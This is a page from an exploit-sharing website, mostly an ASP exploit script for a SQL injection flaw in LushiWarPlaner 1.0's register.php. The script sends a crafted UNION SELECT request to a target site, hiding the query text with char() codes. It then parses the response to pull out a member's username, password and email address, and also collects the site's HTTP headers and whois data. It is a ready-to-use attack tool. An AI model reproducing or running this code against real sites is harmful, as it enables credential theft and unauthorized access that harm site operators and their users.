0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
LushiWarPlaner 1.0 (register.php) Remote SQL Injection Exploit
============================================================== LushiWarPlaner 1.0 (register.php) Remote SQL Injection Exploit ============================================================== <% Response.Buffer = True %> <% On Error Resume Next %> <% Server.ScriptTimeout = 100 %> <% '=============================================================================================== '[Script Name: LushiWarPlaner 1.0 (register.php) Remote SQL Injection Exploit '[Coded by : ajann '[Author : ajann '[Contact : :( '[S.Page : http://www.lushi.de '[ExploitName: exploit2.asp '[Note : exploit file name =>exploit2.asp '[Update: + Get Header '[Update: + Get Whois Info '=============================================================================================== %> <% title="LushiWarPlaner 1.0 (register.php) Remote SQL Injection Exploit" 'Vuln Title %> <html> <title><% = title %></title> <head> <meta name="generator" content="Microsoft FrontPage 5.0"> <script language="JavaScript"> function functionControl1(){ setTimeout("functionControl2()",2000); } function functionControl2(){ if(document.form1.field1.value==""){ alert("[Exploit Failed]=>The Username and Password Didnt Take,Try Again"); } } function writetext() { if(document.form1.field1.value==""){ document.getElementById('htmlAlani').innerHTML='<font face=\"Verdana\" size=\"1\" color=\"#008000\">There is a problem... The Data Didn\'t Take </font>' } } function write(){ setTimeout("writetext()",1000); } </script> </head> <body bgcolor="#000000" link="#008000" vlink="#008000" alink="#008000"> <center> <font face="Verdana" size="2" color="#008000"><b><a href="exploit2.asp"><u><% = title %> </b></u></a></font><br><br> <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080"> <tr> <td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';"> <font face="Arial" size="1"><b><font color="#FFFFFF">TARGET:</font>Example:[http://x.com/path]</b></font><p> <b><font face="Arial" size="1" color="#FFFFFF">USER ID:</font></b><font face="Arial" size="1"><b>Example:[User ID=1]</b></font></p> </td> <td width="50%"> <center> <form method="post" name="form1" action="exploit2.asp?islem=get"> <input type="text" name="text1" value="http://" size="25" style="background-color: #808080"><br><input type="text" name="id" value="10" size="25" style="background-color: #808080"> <input type="submit" value="Get"></form></center></td> </tr> </table> <div id=htmlAlani></div> <% islem = Request.QueryString("islem") If islem = "hata1" Then Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please complete to the whole spaces</font>" End If If islem = "hata2" Then Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please right character use</font>" End If If islem = "hata3" Then Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Add ""http://""</font>" End If If islem = "hata4" Then Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Just Numeric Character!</font>" End If %> <% If islem = "get" Then id= Request.Form("id") file="register.php?id=" sql="-1%20union%20select%200,mail,2,3,4,5,6," sql1="concat(char(85,115,101,114,110,97," sql2="109,101,58),char(32),Name,c" sql3="har(32),char(80,97,115,115,119,11" sql4="1,114,100,58),Passwort),8,9%20fr" sql5="om%20members%20where%20id=" sql6=id idform = Request.Form("id") targettext = Request.Form("text1") arama=InStr(1, targettext, "union" ,1) arama2=InStr(1, targettext, "http://" ,1) If targettext="" Then Response.Redirect("exploit2.asp?islem=hata1") Else If arama>0 then Response.Redirect("exploit2.asp?islem=hata2") Else If arama2=0 then Response.Redirect("exploit2.asp?islem=hata3") Else IF Not IsNumeric(idform) Then Response.Redirect("exploit2.asp?islem=hata4") Else %> <% target1 = targettext+file+sql+sql1+sql2+sql3+sql4+sql5+sql6 Public Function take(come) Set objtake = Server.CreateObject("Microsoft.XMLHTTP" ) With objtake .Open "GET" , come, FALSE .sEnd take = .Responsetext End With SET objtake = Nothing End Function get_username = take(target1) getdata=InStr(get_username,"0 0/" ) username=Mid(get_username,getdata+5,90) Dim metin metin = take(target1) Dim objReg Set objReg = New RegExp objReg.Global = False objReg.IgnoreCase = True objReg.Pattern = "Username: [A-Za-z0-9?]+ Pass" Dim calistir, istediginString Set calistir = objReg.Execute(metin) If calistir.Count = 0 Then Response.write "Not True" Else basusername = Replace(calistir.Item(0), "Username: " , "" ) basusername = Replace(basusername, " Pass" , "" ) objReg.Pattern = "Password:[A-Za-z0-9?]+</td>" Set calistir = objReg.Execute(metin) baspassword = Replace(calistir.Item(0), "Password:" , "" ) baspassword = Replace(baspassword, "</td>" , "" ) objReg.Pattern = "target=""_blank"" title=""0"">[A-Za-z0-9@.]+</a>" Set calistir = objReg.Execute(metin) basemail = Replace(calistir.Item(0), "target=""_blank"" title=""0"">" , "" ) basemail = Replace(basemail, "</a>" , "" ) End If Set bulunanlar = Nothing Set objReg = Nothing %> <center> <font face="Verdana" size="2" color="#008000"> <u><b> ajann<br></b></u></font><br> <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080"> <tr> <td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">&nbps;&nbps;&nbps;&nbps;&nbps;&nbps;&nbps; &nbps;&nbps;&nbps;&nbps;&nbps; <b><font size="2" face="Arial">Username:</font></b></td> <td width="80%"> &nbps;<b><font color="#C0C0C0" size="2" face="Verdana"><%=basusername%></b></font></p> </td> </tr> <tr> <td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">&nbps;&nbps;&nbps;&nbps;&nbps;&nbps;&nbps; &nbps;&nbps;&nbps;&nbps;&nbps; <b><font size="2" face="Arial">Password:</font></b></td> <td width="80%"> &nbps;<b><font color="#C0C0C0" size="2" face="Verdana"><%=baspassword%></b></font></p> </td> </tr> <tr> <td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">&nbps;&nbps;&nbps;&nbps;&nbps;&nbps;&nbps; &nbps;&nbps;&nbps;&nbps;&nbps; <b><font size="2" face="Arial">Email:</font></b></td> <td width="80%"> &nbps;<b><font color="#C0C0C0" size="2" face="Verdana"><%=basemail%></b></font></p> </td> </tr> </table> </center> <br> <% hedef = targettext Dim objem Set objem = Server.CreateObject("MSXML2.ServerXMLHTTP") objem.Open "GET" , hedef , false objem.sEnd strHTML = objem.ResponseText header=objem.getallResponseheaders() Response.Write "<center>" Response.Write "<b>" Response.Write "<p><font color=""#008000"" face=""Verdana"" size=""2"">Header Bilgileri</font></p>" Response.Write "</b>" Response.Write "<p><font color=""#008000"" face=""Verdana"" size=""2"">" & header & "</font></p>" Response.Write "<p><font color=""#008000"" face=""Verdana"" size=""2""><b>Whois</b></font></p>" Response.Write "<p><font size=""2"" color=""#008000"">Site:</font><font color=""#008000"" size=""1"">[google.com]</font></p>" Response.Write "</center>" Set objem=Nothing %> <center><form method="post" name="form2" action="exploit2.asp?islem=whois"> <p> <input type="text" name="whoissite" size="20" value="domainwhois" style="font-family: Verdana; font-size: 10pt; color: #008000; border: 1px dashed #008000; background-color: #000000"> <input type="submit" value="Yolla" name="B1"></p> </form></center> <br> <form method="POST" name="form2" action="#"> <input type="hidden" name="field1" size="20" value="sdfsd"> </form> <script language="JavaScript"> write() functionControl1() </script> </b></font> </body> </html> <% End If End If End If End If End If %> <% If islem = "whois" Then site = Request.Form("whoissite") target1 = "http://reports.internic.net/cgi/whois?whois_nic=" & site & "&type=domain" Public Function take(come) Set objtake = Server.CreateObject("Microsoft.XMLHTTP" ) With objtake .Open "GET" , come, FALSE .sEnd take = .Responsetext End With Set objtake = Nothing End Function remoteadres=take(target1) dim baslangic , bitis baslangic = "<pre>" bitis = "</pre>" dim x , abc x = 0 abc = 0 dim sonuc sonuc = "" Do Until abc = 2 x = x + 1 If Mid(remoteadres,x,Len(bitis)) = bitis and abc = 1 Then abc = abc + 1 End If If Mid(remoteadres,x,Len(baslangic)) = baslangic Then abc = abc + 1 Else If abc = 1 Then sonuc = sonuc + Mid(remoteadres,x,1) End If End If Loop Set objtake=Nothing %> <center> <b><font color="#008000" face="Verdana" size="2">Whois Bilgileri</font></b><p> <textarea rows="20" name="S1" cols="68" style="font-family: Verdana; font-size: 10pt; color: #008000; border: 1px dotted #008000; background-color: #000000"> <% Response.Write "<" & sonuc %> </textarea> </p> </center> <center><form method="post" name="form2" action="exploit2.asp?islem=whois"> <p> <input type="text" name="whoissite" size="20" value="domainwhois" style="font-family: Verdana; font-size: 10pt; color: #008000; border: 1px dashed #008000; background-color: #000000"> <input type="submit" value="Yolla" name="B1"></p> </form></center> <% End If %> <% Response.Write "<br>" Response.Write "<center>" Response.Write "<pre class=""info"">" Response.Write "<font color=""#C0C0C0"" size=""1"">" Response.Write "En iyi " Response.Write "</font>" Response.Write "<font size=""1"" color=""#808080""><span class=""info2"">" Response.Write "1152x864 " Response.Write "</span></font>" Response.Write "<font color=""#C0C0C0"" size=""1"">??z?n?rl?k ve " Response.Write "<span class=""info2""><font size=""1"" color=""#808080"">Firefox </font></span>" Response.Write "ile g?r?nt?l?nebilir.</font></pre>" Response.Write "<pre class=""info"">" Response.Write "<font color=""#C0C0C0"" size=""1"">" Response.Write "Exploit coded by " Response.Write "</font>" Response.Write "<font size=""1"" color=""#808080""><span class=""info2"">" Response.Write "ajann" Response.Write "</span></font>" Response.Write "</center>" %> # 0day.today [2024-07-01] #